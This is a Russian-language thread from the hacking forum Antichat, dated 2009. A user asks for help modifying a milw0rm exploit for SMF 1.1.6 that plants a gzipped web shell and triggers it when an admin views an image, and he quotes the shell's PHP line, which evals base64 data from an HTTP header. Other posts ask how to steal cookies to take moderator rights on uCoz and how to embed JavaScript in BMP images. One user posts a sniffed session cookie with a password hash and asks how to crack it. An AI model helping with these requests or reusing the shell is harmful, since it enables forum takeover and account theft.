Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

13.08.2009, 02:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 2
Провел на форуме: 6657
Репутация:
0
|
|
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
|
|
|

13.08.2009, 10:37
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от leadtek
http://milw0rm.com/exploits/6993
Вот есть такой эксплойт для SMF 1.1.6
Работает по принципу:
1. Создает тему, в посте прикрепляется файл, g(zip) с шеллом.
2. Получает ссылку на прикрепленный файл, редактирует пост и добавляет [img]ссылка на файл[/img].
3. Когда админ заходит в тему и видит картинку, шелл распаковывается.
Все. Но... Не помог бы мне кто-нибудь подредактировать эксплойт, чтобы создавалась не тема, а просто писался пост в уже существующую тему?
А не проще это сделать всё руками? если алгоритм понятен?
|
|
|

13.08.2009, 21:28
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 2
Провел на форуме: 6657
Репутация:
0
|
|
Если бы все было бы ПОЛНОСТЬЮ понятно, то да %) Я не совсем, например, понял, что за шелл в архиве лежит...
Код:
if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
Это случаем не он?
|
|
|

14.08.2009, 00:34
|
|
Banned
Регистрация: 13.06.2009
Сообщений: 12
Провел на форуме: 138348
Репутация:
10
|
|
Парни подскажити как изменить дату регестрации на форуме?
мне на локалке нужно сделать это 
Если кто реально поможет вознагразу 3 баксами.
|
|
|

16.08.2009, 13:01
|
|
Новичок
Регистрация: 14.08.2009
Сообщений: 16
Провел на форуме: 33794
Репутация:
0
|
|
нужен vBulletin версии 3.0.x
выложите кто-нибудь
в инете искал так и не нашёл, либо битая ссылка, либо нету сидеров
----------------------------------------------------------------------
уже найдено
Последний раз редактировалось Magister Yoda; 18.08.2009 в 11:20..
|
|
|

16.08.2009, 15:04
|
|
Новичок
Регистрация: 18.01.2007
Сообщений: 15
Провел на форуме: 23789
Репутация:
8
|
|
Кто подгонет материал (темы) на получения прав главного модера на юкозе? (как куки стырить и т.д)
|
|
|

17.08.2009, 14:56
|
|
Новичок
Регистрация: 16.04.2009
Сообщений: 1
Провел на форуме: 11189
Репутация:
0
|
|
Меня интересует, можно-ли как-нибудь поднять себе репутацию на форуме версии vBulletin® Version 3.8.3 ? 
|
|
|

05.09.2009, 15:08
|
|
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме: 4435957
Репутация:
539
|
|
Подскажите пожалуйста как узнать пути до панели администратора в vBulletin? 
|
|
|

07.09.2009, 17:50
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 2
Провел на форуме: 12085
Репутация:
0
|
|
подскажите вот слышал о внедрении javascript в BMP рисунок, какой программой это можно сделать или какому правилу следовать пользуясь hex редактором ?
|
|
|

08.09.2009, 11:03
|
|
Новичок
Регистрация: 06.09.2009
Сообщений: 1
Провел на форуме: 21712
Репутация:
0
|
|
Snif
Вобщем проблемка такая, соснифил следущее:
Код:
session_id=a534e4ee349465d8932b52571006737d; modtids=,; forum_read=a:1:{i:7;i:1252358976;}; topicsread=a:1:{i:2;i:1252358990;}; member_id=5; pa ss_hash=c3e5d90d2478f52d9f0aff89e10f1c25; coppa=0; anonlogin=-1
Помогите разобратся нубу xD особенно интересует как разшифровать pa ss_hash (пробовал различные сервисы, онлайн по расшифровке хэшей и программы)
З.Ы. Интересует сам алгоритм собственно и как можно его разшифровать.
P.P.S. PasswordPro не помогает 
Последний раз редактировалось warlock000; 08.09.2009 в 12:02..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|